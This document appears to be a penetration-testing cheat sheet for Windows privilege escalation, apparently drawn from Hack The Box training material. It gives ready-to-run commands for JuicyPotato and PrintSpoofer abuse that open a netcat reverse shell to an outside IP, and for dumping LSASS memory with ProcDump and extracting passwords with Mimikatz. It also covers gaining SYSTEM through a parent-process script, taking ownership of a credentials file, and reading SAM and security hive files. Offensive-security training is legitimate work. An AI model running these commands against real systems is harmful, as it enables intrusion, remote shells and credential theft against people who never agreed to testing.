Windows User Privileges

SeImpersonate Privilege

Attackers often abuse this privilege in the "Potato style" privescs - where a service account can SeImpersonate, but not obtain full SYSTEM level privileges.

JuicyPatato Method

https://github.com/ohpe/juicy-potato

c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *

PrintSpoofer Method

JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards. However, PrintSpoofer and RoguePotato can be used to leverage the same privileges and gain NT AUTHORITY\SYSTEM level access. https://github.com/itm4n/PrintSpoofer

c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

SeDebugPrivilege

To run a particular application or service or assist with troubleshooting, a user might be assigned the SeDebugPrivilege instead of adding the account into the administrators group.

We can use ProcDump from the SysInternals suite to leverage this privilege and dump process memory.

Dump Lsass

1 Dump lsass Process

procdump.exe -accepteula -ma lsass.exe lsass.dmp

2 Mimikatz Dump lsass Dump

# Specify Dump File
sekurlsa::minidump lsass.dmp

# Dump Creds
sekurlsa::logonpasswords

RCE

https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1

1 List Processes

tasklist /svc

2 Use PoC Script

[MyProcess]::CreateProcessFromParent(612,"c:\Windows\System32\cmd.exe","")

SeTakeOwnershipPrivilege

SeTakeOwnershipPrivilege grants a user the ability to take ownership of any "securable object," meaning Active Directory objects, NTFS files/folders, printers, registry keys, services, and processes.

https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1

1 Enable Privilege

# Import Module
Import-Module .\Enable-Privilege.ps1

# Run Script
.\EnableAllTokenPrivs.ps1

# Verify 
whoami /priv

2 Check OwnerShip File

cmd /c dir /q 'C:\Department Shares\Private\IT'

3 Taking Ownership File

takeown /f 'C:\Department Shares\Private\IT\cred.txt'

4 Confirming Ownership

 Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}

5 Modify ACL on File

icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F

Interesting Files to Read

c:\inetpub\wwwwroot\web.config
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav